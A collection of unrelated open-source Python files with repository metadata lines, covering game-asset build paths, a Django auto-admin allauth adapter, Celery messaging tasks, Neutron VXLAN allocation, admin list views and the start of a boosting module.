MapSourceDirectories += [ "stuff/caravan/agents/_textures/actors" ]
MapSourceDirectories += [ "stuff/caravan/agents/_textures/actors/visages" ]
MapUncompressedSourceDirectories = [ ]
MapPanoplySourceDirectories = [ ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_matis.cfg" ] + [ "stuff/matis/agents/_textures/actors" ] + [ "stuff/matis/agents/_textures/actors/mask" ] ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_tryker.cfg" ] + [ "stuff/tryker/agents/_textures/actors" ] + [ "stuff/tryker/agents/_textures/actors/mask" ] ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_fyros.cfg" ] + [ "stuff/fyros/agents/_textures/actors" ] + [ "stuff/fyros/agents/_textures/actors/mask" ] ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_zorai.cfg" ] + [ "stuff/zorai/agents/_textures/actors" ] + [ "stuff/zorai/agents/_textures/actors/mask" ] ]
MapPanoplySourceDirectories += [ [ "panoply_common.cfg" ] + [ "panoply_generique.cfg" ] + [ "stuff/generique/agents/_textures/actors" ] + [ "stuff/generique/agents/_textures/actors/mask" ] ]
# *** EXPORT DIRECTORIES FOR THE BUILD PIPELINE ***
# Map directories
MapExportDirectory = CommonPath + "/map_export"
MapUncompressedExportDirectory = CommonPath + "/map_uncompressed"
# *** BUILD DIRECTORIES FOR THE BUILD PIPELINE ***
# Map directories
MapBuildDirectory = CommonPath + "/map"
MapPanoplyBuildDirectory = CommonPath + "/map_panoply"
MapPanoplyHlsInfoBuildDirectory = CommonPath + "/map_panoply_hls_info"
MapPanoplyHlsBankBuildDirectory = CommonPath + "/map_panoply_hls_bank"
MapPanoplyCacheBuildDirectory = CommonPath + "/map_panoply_cache"
MapTagBuildDirectory = CommonPath + "/map_tag"
# *** INSTALL DIRECTORIES IN THE CLIENT DATA ***
# Map directory
MapInstallDirectory = CommonName
BitmapInstallDirectory = MapInstallDirectory
| osgcc/ryzom | ryzom/tools/build_gamedata/workspace/common/characters_maps_hr/directories.py | Python | agpl-3.0 | 3,224 |
"""
Authentication adapters for Allauth
"""
try:
from allauth.account.adapter import DefaultAccountAdapter
except ImportError:
print('ERROR: This authentication adapter requires django-allauth.')
raise
from django.conf import settings
from django.contrib import messages
from django.utils.translation import ugettext_lazy as _
ADMIN_EMAIL_ADDRESSES = [email for name, email in settings.ADMINS]
class AutoadminAccountAdapter(DefaultAccountAdapter):
"""
Allauth account adapter that enables automatic grant of admin permissions
to users signing up having their email address listed in the ``ADMINS``
Django settings. Django settings needed to activate this feature:
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.sites',
'allauth',
'allauth.account',
'allauth.socialaccount',
]
ACCOUNT_ADAPTER = 'autoadmin.auth.allauth.AutoadminAccountAdapter'
See also:
- http://django-allauth.readthedocs.io/en/latest/configuration.html
- http://django-allauth.readthedocs.io/en/latest/advanced.html#admin
"""
def confirm_email(self, request, email_address):
"""
Give superuser privileges automagically if the email address of a
user confirming their email is listed in ``settings.ADMINS``.
"""
super(AutoadminAccountAdapter,
self).confirm_email(request, email_address)
if email_address.email in ADMIN_EMAIL_ADDRESSES:
user = email_address.user
user.is_staff = user.is_superuser = True
user.save()
messages.add_message(
request, messages.INFO,
_('Welcome Admin! You have been given superuser privileges. '
'Use them with caution.')
)
| rosarior/django-autoadmin | autoadmin/auth/allauth.py | Python | mit | 1,844 |
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import clf , plot , draw , show
import tensorblock as tb
### Plot Initialize
def initialize( shape ):
plt.figure( figsize = ( 12 , 9 ) )
### Plot Reconstruction
def reconst( x1 , x2 ,
epoch = 0 , dir = 'figures' , shape = None ):
if len( x1.shape ) == 2:
s = tb.aux.side2D( x1.shape[1] ) ; x1 = x1.reshape( [ -1 , s , s , 1 ] )
if len( x2.shape ) == 2:
s = tb.aux.side2D( x2.shape[1] ) ; x2 = x2.reshape( [ -1 , s , s , 1 ] )
r , c = shape ; k = 0
for j in range( r ):
for i in range( c ):
plt.subplot( 2 * r , c , i + 2 * j * c + 1 )
plt.imshow( x1[ k , : , : , 0 ] , vmin = 0 , vmax = 1 )
plt.axis( 'off' )
plt.subplot( 2 * r , c , i + 2 * j * c + c + 1 )
plt.imshow( x2[ k , : , : , 0 ] , vmin = 0 , vmax = 1 )
plt.axis( 'off' )
k = k + 1
if not os.path.exists( dir ): os.makedirs( dir )
plt.savefig( dir + '/epoch%d.png' % epoch , bbox_inches = 'tight' )
| NiloFreitas/Deep-Reinforcement-Learning | tensorblock/functions/func_plotters.py | Python | mit | 1,085 |
import os
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
from gtm import __version__
setup(
name = "django-google-tag-manager",
version = __version__,
author = "Tomas Neme",
author_email = "[email protected]",
description = ("Easily include your Google Tag Manager tag in your "
"django site"),
license = "MIT",
keywords = "django generic-views",
url = "https://github.com/Lacrymology/django-google-tag-manager",
packages=find_packages(),
include_package_data=True,
long_description=read('README.md'),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: MIT License",
],
)
| Lacrymology/django-google-tag-manager | setup.py | Python | mit | 1,031 |
try:
from urlparse import urlunparse
except ImportError:
from urllib.parse import urlunparse
from datetime import timedelta
from functools import partial
from celery.exceptions import SoftTimeLimitExceeded
from celery.task import Task
from celery.utils.log import get_task_logger
from demands import HTTPServiceError
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
from django.core import serializers
from django.core.cache import caches
from django.core.exceptions import ObjectDoesNotExist
from django.db import transaction
from django.db.models import Count, F, Q
from django.utils.timezone import now
from requests.exceptions import ConnectionError, HTTPError, Timeout
from seed_services_client import MessageSenderApiClient, SchedulerApiClient
from seed_services_client.metrics import MetricsApiClient
from contentstore.models import Message, Schedule
from seed_stage_based_messaging import utils
from seed_stage_based_messaging.celery import app
from .models import (
BehindSubscription,
EstimatedSend,
ResendRequest,
Subscription,
SubscriptionSendFailure,
)
logger = get_task_logger(__name__)
locmem_cache = caches["locmem"]
redis_cache = caches["redis"]
def get_metric_client(session=None):
return MetricsApiClient(
url=settings.METRICS_URL, auth=settings.METRICS_AUTH, session=session
)
def make_absolute_url(path):
# NOTE: We're using the default site as set by
# settings.SITE_ID and the Sites framework
site = get_current_site(None)
return urlunparse(
("https" if settings.USE_SSL else "http", site.domain, path, "", "", "")
)
class FireMetric(Task):
""" Fires a metric using the MetricsApiClient
"""
name = "subscriptions.tasks.fire_metric"
def run(self, metric_name, metric_value, session=None, **kwargs):
metric_value = float(metric_value)
metric = {metric_name: metric_value}
metric_client = get_metric_client(session=session)
metric_client.fire_metrics(**metric)
return "Fired metric <%s> with value <%s>" % (metric_name, metric_value)
fire_metric = FireMetric()
class StoreResendRequest(Task):
"""
Task to save resend request and trigger send last message to the user.
"""
name = "subscriptions.tasks.store_resend_request"
def run(self, subscription_id, **kwargs):
resend_request = ResendRequest.objects.create(subscription_id=subscription_id)
send_current_message.delay(subscription_id, resend_request.id)
return "Message queued for resend, subscriber: {}".format(subscription_id)
store_resend_request = StoreResendRequest()
class BaseSendMessage(Task):
"""
Base Task for sending messages
"""
class FailedEventRequest(Exception):
"""
The attempted task failed because of a non-200 HTTP return
code.
"""
def on_failure(self, exc, task_id, args, kwargs, einfo):
# This function only gets called once all retries have failed, not with
# each retry, this was tested in real life and is tested on a Celery
# level but doesn't work with unit tests when CELERY_ALWAYS_EAGER is
# True.
# The function is called directly in the unit tests to make sure this
# functionality works
if isinstance(args[0], dict):
subscription_id = args[0]["subscription_id"]
else:
subscription_id = args[0]
SubscriptionSendFailure.objects.create(
subscription_id=subscription_id,
initiated_at=self.request.eta or now(),
reason=str(exc),
task_id=task_id,
)
super(BaseSendMessage, self).on_failure(exc, task_id, args, kwargs, einfo)
@app.task(
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
bind=True,
)
def pre_send_process(self, subscription_id, resend_id=None):
logger.debug("Locking subscription")
key = "subscription_lock:{}".format(subscription_id)
locked = not redis_cache.add(
key,
now() + timedelta(seconds=settings.SUBSCRIPTION_LOCK_TIMEOUT),
timeout=settings.SUBSCRIPTION_LOCK_TIMEOUT,
)
if locked:
retry_timestamp = redis_cache.get(key)
logger.debug("Subscription locked, retrying at {}".format(retry_timestamp))
self.retry(eta=retry_timestamp)
context = {}
if resend_id:
context["resend_id"] = resend_id
logger.info("Loading Subscription")
subscription = Subscription.objects.select_related("messageset").get(
id=subscription_id
)
if not subscription.is_ready_for_processing:
if subscription.process_status == 2 or subscription.completed is True:
# Subscription is complete
logger.info("Subscription has completed")
context["error"] = "Subscription has completed"
else:
logger.info("Message sending aborted - broken or inactive")
# TODO: be more specific about why it aborted
context["error"] = (
"Message sending aborted, status <%s>" % subscription.process_status
)
return context
context.update(
{
"subscription": serializers.serialize("json", [subscription]),
"messageset": serializers.serialize("json", [subscription.messageset]),
}
)
try:
logger.info("Loading Message")
next_sequence_number = subscription.next_sequence_number
if next_sequence_number > 1 and resend_id:
next_sequence_number -= 1
message = locmem_cache.get_or_set(
"message:{}:{}:{}".format(
subscription.messageset_id, next_sequence_number, subscription.lang
),
partial(
Message.objects.get,
messageset=subscription.messageset,
sequence_number=next_sequence_number,
lang=subscription.lang,
),
)
context["message"] = serializers.serialize("json", [message])
except ObjectDoesNotExist:
error = (
"Missing Message: MessageSet: <%s>, Sequence Number: <%s>" ", Lang: <%s>"
) % (
subscription.messageset,
subscription.next_sequence_number,
subscription.lang,
)
logger.error(error, exc_info=True)
context["error"] = "Message sending aborted, missing message"
return context
return context
@app.task(
autoretry_for=(
HTTPError,
ConnectionError,
Timeout,
HTTPServiceError,
SoftTimeLimitExceeded,
),
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
)
def get_identity_address(context):
if "error" in context:
return context
[deserialized_subscription] = serializers.deserialize(
"json", context["subscription"]
)
subscription = deserialized_subscription.object
to_addr = utils.get_identity_address(
subscription.identity, use_communicate_through=True
)
if to_addr is None:
logger.info("No valid recipient to_addr found")
subscription.process_status = -1
deserialized_subscription.save(update_fields=("process_status",))
context["error"] = "Valid recipient could not be found"
else:
context["to_addr"] = to_addr
return context
@app.task(
autoretry_for=(
HTTPError,
ConnectionError,
Timeout,
HTTPServiceError,
SoftTimeLimitExceeded,
),
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
)
def send_message(context):
if "error" in context:
return context
[deserialized_subscription] = serializers.deserialize(
"json", context["subscription"]
)
subscription = deserialized_subscription.object
[messageset] = serializers.deserialize("json", context["messageset"])
messageset = messageset.object
[message] = serializers.deserialize("json", context["message"])
message = message.object
payload = {
"to_addr": context["to_addr"],
"to_identity": subscription.identity,
"delivered": "false",
"resend": "true" if "resend_id" in context else "false",
"metadata": message.metadata,
}
if messageset.channel:
payload["channel"] = messageset.channel
prepend_next = (subscription.metadata or {}).get("prepend_next_delivery", None)
if messageset.content_type == "text":
logger.debug("Determining payload content")
if prepend_next:
logger.debug("Prepending next delivery")
payload["content"] = "%s\n%s" % (prepend_next, message.text_content)
else:
logger.debug("Loading default content")
payload["content"] = message.text_content
if message.binary_content:
payload["metadata"]["image_url"] = make_absolute_url(
message.binary_content.content.url
)
logger.debug("text content loaded")
else:
if prepend_next:
payload["metadata"]["voice_speech_url"] = [
prepend_next,
make_absolute_url(message.binary_content.content.url),
]
else:
payload["metadata"]["voice_speech_url"] = [
make_absolute_url(message.binary_content.content.url)
]
if messageset.id in settings.DRY_RUN_MESSAGESETS:
logger.info("Skipping sending of message")
else:
logger.info("Sending message to Message Sender")
message_sender_client = MessageSenderApiClient(
settings.MESSAGE_SENDER_TOKEN,
settings.MESSAGE_SENDER_URL,
retries=5,
timeout=settings.DEFAULT_REQUEST_TIMEOUT,
)
result = message_sender_client.create_outbound(payload)
context["outbound_id"] = result["id"]
if prepend_next:
logger.debug("Clearing prepended message")
subscription.metadata["prepend_next_delivery"] = None
deserialized_subscription.save(update_fields=("metadata",))
context["subscription"] = serializers.serialize("json", [subscription])
logger.debug("Message queued for send. ID: <%s>" % str(context.get("outbound_id")))
return context
@app.task(
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
)
def post_send_process(context):
"""
Task to ensure subscription is bumped or converted
"""
if "error" in context:
return context
[deserialized_subscription] = serializers.deserialize(
"json", context["subscription"]
)
subscription = deserialized_subscription.object
[messageset] = serializers.deserialize("json", context["messageset"])
messageset = messageset.object
# Get set max
set_max = locmem_cache.get_or_set(
"messageset_size:{}:{}".format(messageset.id, subscription.lang),
messageset.messages.filter(lang=subscription.lang).count,
)
logger.debug("set_max calculated - %s" % set_max)
# Compare user position to max
if subscription.next_sequence_number == set_max:
with transaction.atomic():
# Mark current as completed
logger.debug("marking current subscription as complete")
subscription.completed = True
subscription.active = False
subscription.process_status = 2 # Completed
subscription.updated_at = now()
deserialized_subscription.save(
update_fields=("completed", "active", "process_status", "updated_at")
)
# If next set defined create new subscription
if messageset.next_set:
logger.info("Creating new subscription for next set")
newsub = Subscription.objects.create(
identity=subscription.identity,
lang=subscription.lang,
messageset=messageset.next_set,
schedule=messageset.next_set.default_schedule,
)
logger.debug("Created Subscription <%s>" % newsub.id)
else:
# More in this set so increment by one
logger.debug("incrementing next_sequence_number")
subscription.next_sequence_number = F("next_sequence_number") + 1
subscription.updated_at = now()
logger.debug("saving subscription")
deserialized_subscription.save(
update_fields=("next_sequence_number", "updated_at")
)
logger.debug("unlocking the subscription")
redis_cache.delete("subscription_lock:{}".format(subscription.id))
# return response
return "Subscription for %s updated" % str(subscription.id)
@app.task(
retry_backoff=True,
retry_jitter=True,
max_retries=15,
acks_late=True,
soft_time_limit=10,
time_limit=15,
base=BaseSendMessage,
)
def post_send_process_resend(context):
[message] = serializers.deserialize("json", context["message"])
message = message.object
[deserialized_subscription] = serializers.deserialize(
"json", context["subscription"]
)
subscription = deserialized_subscription.object
resend_request = ResendRequest.objects.get(id=context["resend_id"])
with transaction.atomic():
if "outbound_id" in context:
resend_request.outbound = context["outbound_id"]
resend_request.message_id = message.id
resend_request.save(update_fields=("outbound", "message_id"))
subscription.process_status = 0
subscription.updated_at = now()
deserialized_subscription.save(update_fields=("process_status", "updated_at"))
send_next_message = (
pre_send_process.s()
| get_identity_address.s()
| send_message.s()
| post_send_process.s()
)
send_current_message = (
pre_send_process.s()
| get_identity_address.s()
| send_message.s()
| post_send_process_resend.s()
)
class ScheduleDisable(Task):
""" Task to disable a subscription's schedule
"""
name = "subscriptions.tasks.schedule_disable"
def scheduler_client(self):
return SchedulerApiClient(settings.SCHEDULER_API_TOKEN, settings.SCHEDULER_URL)
def run(self, subscription_id, **kwargs):
log = self.get_logger(**kwargs)
log.info("Disabling schedule for <%s>" % (subscription_id,))
try:
subscription = Subscription.objects.get(id=subscription_id)
try:
schedule_id = subscription.metadata["scheduler_schedule_id"]
scheduler = self.scheduler_client()
scheduler.update_schedule(
subscription.metadata["scheduler_schedule_id"], {"enabled": False}
)
log.info(
"Disabled schedule <%s> on scheduler for sub <%s>"
% (schedule_id, subscription_id)
)
return True
except Exception:
log.info("Schedule id not saved in subscription metadata")
return False
except ObjectDoesNotExist:
logger.error("Missing Subscription", exc_info=True)
except SoftTimeLimitExceeded:
logger.error(
"Soft time limit exceed processing schedule create " "via Celery.",
exc_info=True,
)
return False
schedule_disable = ScheduleDisable()
class ScheduledMetrics(Task):
""" Fires off tasks for all the metrics that should run
on a schedule
"""
name = "subscriptions.tasks.scheduled_metrics"
def run(self, **kwargs):
globs = globals() # execute globals() outside for loop for efficiency
for metric in settings.METRICS_SCHEDULED_TASKS:
globs[metric].apply_async()
return "%d Scheduled metrics launched" % len(settings.METRICS_SCHEDULED_TASKS)
scheduled_metrics = ScheduledMetrics()
class FireWeekEstimateLast(Task):
"""Fires week estimated send counts.
"""
name = "subscriptions.tasks.fire_week_estimate_last"
def run(self):
schedules = Schedule.objects.filter(
subscriptions__active=True,
subscriptions__completed=False,
subscriptions__process_status=0,
).annotate(total_subs=Count("subscriptions"))
totals = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0, 6: 0}
for schedule in schedules:
for day in range(7):
if str(day) in schedule.day_of_week or "*" in schedule.day_of_week:
totals[day] = totals[day] + schedule.total_subs
# Django's datetime's weekday method has Monday = 0
# whereas the cron format used in the schedules has Sunday = 0
sunday = totals.pop(0)
totals[7] = sunday
totals = {(k - 1): v for k, v in totals.items()}
today = now()
for dow, total in totals.items():
# Only fire the metric for today or days in the future so that
# estimates for the week don't get updated after the day in
# question.
if dow >= (today.weekday()):
fire_metric.apply_async(
kwargs={
"metric_name": "subscriptions.send.estimate.%s.last" % dow,
"metric_value": total,
}
)
fire_week_estimate_last = FireWeekEstimateLast()
class FireDailySendEstimate(Task):
"""Fires daily estimated send counts.
"""
name = "subscriptions.tasks.fire_daily_send_estimate"
def run(self):
# Django's datetime's weekday method has Monday = 0
# whereas the cron format used in the schedules has Sunday = 0
day = now().weekday() + 1
schedules = (
Schedule.objects.filter(
Q(day_of_week__contains=day) | Q(day_of_week__contains="*"),
subscriptions__active=True,
subscriptions__completed=False,
subscriptions__process_status=0,
)
.values("subscriptions__messageset")
.annotate(
total_subs=Count("subscriptions"),
total_unique=Count("subscriptions__identity", distinct=True),
)
)
for schedule in schedules:
EstimatedSend.objects.get_or_create(
send_date=now().date(),
messageset_id=schedule["subscriptions__messageset"],
estimate_subscriptions=schedule["total_subs"],
estimate_identities=schedule["total_unique"],
)
fire_daily_send_estimate = FireDailySendEstimate()
class RequeueFailedTasks(Task):
"""
Task to requeue failed schedules.
"""
name = "subscriptions.tasks.requeue_failed_tasks"
def run(self, **kwargs):
log = self.get_logger(**kwargs)
failures = SubscriptionSendFailure.objects
log.info(
"Attempting to requeue <%s> failed Subscription sends"
% failures.all().count()
)
for failure in failures.iterator():
subscription_id = str(failure.subscription_id)
# Cleanup the failure before requeueing it.
failure.delete()
send_next_message.delay(subscription_id)
requeue_failed_tasks = RequeueFailedTasks()
@app.task
def calculate_subscription_lifecycle(subscription_id):
"""
Calculates the expected lifecycle position the subscription in
subscription_ids, and creates a BehindSubscription entry for them.
Args:
subscription_id (str): ID of subscription to calculate lifecycle for
"""
subscription = Subscription.objects.select_related("messageset", "schedule").get(
id=subscription_id
)
behind = subscription.messages_behind()
if behind == 0:
return
current_messageset = subscription.messageset
current_sequence_number = subscription.next_sequence_number
end_subscription = Subscription.fast_forward_lifecycle(subscription, save=False)[-1]
BehindSubscription.objects.create(
subscription=subscription,
messages_behind=behind,
current_messageset=current_messageset,
current_sequence_number=current_sequence_number,
expected_messageset=end_subscription.messageset,
expected_sequence_number=end_subscription.next_sequence_number,
)
@app.task
def find_behind_subscriptions():
"""
Finds any subscriptions that are behind according to where they should be,
and creates a BehindSubscription entry for them.
"""
subscriptions = Subscription.objects.filter(
active=True, completed=False, process_status=0
).values_list("id", flat=True)
for subscription_id in subscriptions.iterator():
calculate_subscription_lifecycle.delay(str(subscription_id))
| praekelt/seed-stage-based-messaging | subscriptions/tasks.py | Python | bsd-3-clause | 21,273 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
from django.contrib.auth.models import AbstractUser
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
@python_2_unicode_compatible
class User(AbstractUser):
# First Name and Last Name do not cover name patterns
# around the globe.
name = models.CharField(_("Name of User"), blank=True, max_length=255)
test = models.CharField("test", blank=True, max_length=255)
def __str__(self):
return self.username
def get_absolute_url(self):
return reverse('users:detail', kwargs={'username': self.username})
| show0k/ressources_management_django | flowers_ressources_management/users/models.py | Python | gpl-3.0 | 766 |
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from shuup.admin.utils.picotable import Column, TextFilter
from shuup.admin.utils.views import PicotableListView
from shuup.core.models import ServiceProvider
class ServiceProviderListView(PicotableListView):
model = ServiceProvider
default_columns = [
Column(
"name",
_("Name"),
sort_field="base_translations__name",
filter_config=TextFilter(filter_field="base_translations__name", placeholder=_("Filter by name...")),
),
Column("type", _("Type"), display="get_type_display", sortable=False),
]
toolbar_buttons_provider_key = "service_provider_list_toolbar_provider"
mass_actions_provider_key = "service_provider_mass_actions_provider"
def get_type_display(self, instance):
return instance._meta.verbose_name.capitalize()
def get_object_abstract(self, instance, item):
return [
{"text": "%s" % instance, "class": "header"},
{"text": self.get_type_display(instance)},
]
| shoopio/shoop | shuup/admin/modules/service_providers/views/_list.py | Python | agpl-3.0 | 1,374 |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from oslo.db import exception as db_exc
from six import moves
import sqlalchemy as sa
from sqlalchemy import sql
from neutron.common import exceptions as n_exc
from neutron.db import api as db_api
from neutron.db import model_base
from neutron.i18n import _LE, _LW
from neutron.openstack.common import log
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2.drivers import type_tunnel
LOG = log.getLogger(__name__)
VXLAN_UDP_PORT = 4789
MAX_VXLAN_VNI = 16777215
vxlan_opts = [
cfg.ListOpt('vni_ranges',
default=[],
help=_("Comma-separated list of <vni_min>:<vni_max> tuples "
"enumerating ranges of VXLAN VNI IDs that are "
"available for tenant network allocation")),
cfg.StrOpt('vxlan_group',
help=_("Multicast group for VXLAN. If unset, disables VXLAN "
"multicast mode.")),
]
cfg.CONF.register_opts(vxlan_opts, "ml2_type_vxlan")
class VxlanAllocation(model_base.BASEV2):
__tablename__ = 'ml2_vxlan_allocations'
vxlan_vni = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False, default=False,
server_default=sql.false(), index=True)
class VxlanEndpoints(model_base.BASEV2):
"""Represents tunnel endpoint in RPC mode."""
__tablename__ = 'ml2_vxlan_endpoints'
__table_args__ = (
sa.UniqueConstraint('host',
name='unique_ml2_vxlan_endpoints0host'),
)
ip_address = sa.Column(sa.String(64), primary_key=True)
udp_port = sa.Column(sa.Integer, nullable=False)
host = sa.Column(sa.String(255), nullable=True)
def __repr__(self):
return "<VxlanTunnelEndpoint(%s)>" % self.ip_address
class VxlanTypeDriver(type_tunnel.TunnelTypeDriver):
def __init__(self):
super(VxlanTypeDriver, self).__init__(VxlanAllocation)
def get_type(self):
return p_const.TYPE_VXLAN
def initialize(self):
try:
self._initialize(cfg.CONF.ml2_type_vxlan.vni_ranges)
except n_exc.NetworkTunnelRangeError:
LOG.exception(_LE("Failed to parse vni_ranges. "
"Service terminated!"))
raise SystemExit()
def sync_allocations(self):
# determine current configured allocatable vnis
vxlan_vnis = set()
for tun_min, tun_max in self.tunnel_ranges:
if tun_max + 1 - tun_min > MAX_VXLAN_VNI:
LOG.error(_LE("Skipping unreasonable VXLAN VNI range "
"%(tun_min)s:%(tun_max)s"),
{'tun_min': tun_min, 'tun_max': tun_max})
else:
vxlan_vnis |= set(moves.xrange(tun_min, tun_max + 1))
session = db_api.get_session()
with session.begin(subtransactions=True):
# remove from table unallocated tunnels not currently allocatable
# fetch results as list via all() because we'll be iterating
# through them twice
allocs = (session.query(VxlanAllocation).
with_lockmode("update").all())
# collect all vnis present in db
existing_vnis = set(alloc.vxlan_vni for alloc in allocs)
# collect those vnis that needs to be deleted from db
vnis_to_remove = [alloc.vxlan_vni for alloc in allocs
if (alloc.vxlan_vni not in vxlan_vnis and
not alloc.allocated)]
# Immediately delete vnis in chunks. This leaves no work for
# flush at the end of transaction
bulk_size = 100
chunked_vnis = (vnis_to_remove[i:i + bulk_size] for i in
range(0, len(vnis_to_remove), bulk_size))
for vni_list in chunked_vnis:
session.query(VxlanAllocation).filter(
VxlanAllocation.vxlan_vni.in_(vni_list)).delete(
synchronize_session=False)
# collect vnis that need to be added
vnis = list(vxlan_vnis - existing_vnis)
chunked_vnis = (vnis[i:i + bulk_size] for i in
range(0, len(vnis), bulk_size))
for vni_list in chunked_vnis:
bulk = [{'vxlan_vni': vni, 'allocated': False}
for vni in vni_list]
session.execute(VxlanAllocation.__table__.insert(), bulk)
def get_endpoints(self):
"""Get every vxlan endpoints from database."""
LOG.debug("get_vxlan_endpoints() called")
session = db_api.get_session()
vxlan_endpoints = session.query(VxlanEndpoints)
return [{'ip_address': vxlan_endpoint.ip_address,
'udp_port': vxlan_endpoint.udp_port,
'host': vxlan_endpoint.host}
for vxlan_endpoint in vxlan_endpoints]
def get_endpoint_by_host(self, host):
LOG.debug("get_endpoint_by_host() called for host %s", host)
session = db_api.get_session()
return (session.query(VxlanEndpoints).
filter_by(host=host).first())
def get_endpoint_by_ip(self, ip):
LOG.debug("get_endpoint_by_ip() called for ip %s", ip)
session = db_api.get_session()
return (session.query(VxlanEndpoints).
filter_by(ip_address=ip).first())
def add_endpoint(self, ip, host, udp_port=VXLAN_UDP_PORT):
LOG.debug("add_vxlan_endpoint() called for ip %s", ip)
session = db_api.get_session()
try:
vxlan_endpoint = VxlanEndpoints(ip_address=ip,
udp_port=udp_port,
host=host)
vxlan_endpoint.save(session)
except db_exc.DBDuplicateEntry:
vxlan_endpoint = (session.query(VxlanEndpoints).
filter_by(ip_address=ip).one())
LOG.warning(_LW("Vxlan endpoint with ip %s already exists"), ip)
return vxlan_endpoint
def delete_endpoint(self, ip):
LOG.debug("delete_vxlan_endpoint() called for ip %s", ip)
session = db_api.get_session()
with session.begin(subtransactions=True):
session.query(VxlanEndpoints).filter_by(ip_address=ip).delete()
| blueboxgroup/neutron | neutron/plugins/ml2/drivers/type_vxlan.py | Python | apache-2.0 | 7,094 |
from nav.ipdevpoll.plugins import typeoid
def test_make_new_vendor_id_has_reasonable_response():
sysobjectid = '1.3.6.1.4.1.11.2.3.7.11.51'
assert typeoid.make_new_vendor_id(sysobjectid) == 'hewlettpackard'
| sigmunau/nav | tests/unittests/ipdevpoll/typeoid_test.py | Python | gpl-2.0 | 217 |
import numpy as np
import scipy.weave as weave
import scipy.stats.stats as stats
import cPickle
import os, time
import pdb
# machine epsilon
EPS = np.finfo(np.double).tiny
# sum function that maintains array shape length
sum = lambda x,axes: np.apply_over_axes(np.sum,x,axes)
prod = lambda x,y: x*y
class ADT(dict):
"""A dictionary to store the Alternating Decision Tree model.
An Alternating Decision Tree contains decision nodes and
output nodes. Decision nodes are implemented as a `Node`
class in this module. In the ADT dictionary, keys correspond
to the boosting round in which the node is added and can be
used as a numeric identifier for that decision node. Values
are lists containing an instance of the decision node and
associated output nodes. Adding a child node reveals only
inheritance from its immediate parent.
The ADT is initialized by passing the attributes of the Root
Node.
Arguments
alpha : float
weight of the root node (bias term in the ADT model).
v : array
vote vector of the root node
"""
def __init__(self, alpha, v):
self[-1] = [Node(name='Root'), [alpha, v, []]]
def add_decision_node(self, id, name, threshold):
"""Add a decision node to the ADT.
Arguments
id : int
boosting round in which the node is added.
name : str
string identifying the feature associated with the
decision node.
threshold : float
the threshold on the set of values of the feature
associated with the decision node
"""
self[id] = [Node(name=name, threshold=threshold), [], []]
def add_output_node(self, id, alpha, v, output_type=0):
"""Add an output node to the ADT.
Arguments
id : int
boosting round in which the node is added.
alpha : float
weight of the binary-valued function associated with
the output node
v : int array
vote vector of the binary-valued function associated
with the output node
Kwargs
output_type : {0,1}
this determines which of the two output nodes is
being added
.. note::
There are two output nodes for each decision node, corresponding
to the two binary-valued functions :math:`\psi` and :math:`\\tilde{\psi}`
(see `paper <http://arxiv.org/abs/1105.5821>`_ for details). The
parameter `output_type` determines which of these two output
nodes is being added to the model.
"""
self[id][output_type+1] = [alpha, v, []]
def add_child(self, parent, child, output_type=0):
"""Append the new decision node as a child of an existing parent
node.
Arguments
parent : int
node identifier of the parent decision node to which new
decision node is being added.
child : int
node identifier of the new decision node.
Kwargs
output_type : {0,1}
this determines to which of the two output nodes of the
parent decision node is the new decision node being added.
"""
try:
self[parent][output_type+1][2].append(child)
except IndexError:
print (parent, output_type, self[parent])
class Node:
"""A class to hold attributes of decision nodes in an ADT.
Kwargs
name : str
string identifying the feature associated with the
decision node.
threshold : int or float
the threshold on the set of values of the feature
associated with the decision node
"""
def __init__(self, name=None, threshold=None):
if name:
self.name = name
else:
self.name = 'Root'
if threshold:
self.threshold = threshold
def adaboost(X, Y, x, y, T, output_file=None, kmer_dict=None, \
model='stump', predicted_labels=None, test_indices=None):
"""This function runs Adaboost, given some training and
testing data.
Arguments
X : float array
Training data where rows correspond to features
and columns to samples.
Y : float array
Training labels where rows correspond to labels
and columns to samples. This is an array of {1,-1}.
x : float array
Testing data with similar row,column properties
as training data.
y : float array
Testing labels with similar row,column properties
as training labels.
T : int
Number of boosting rounds
Kwargs
output_file : str
A full file path to which results can be written
during code execution. If not provided, the code
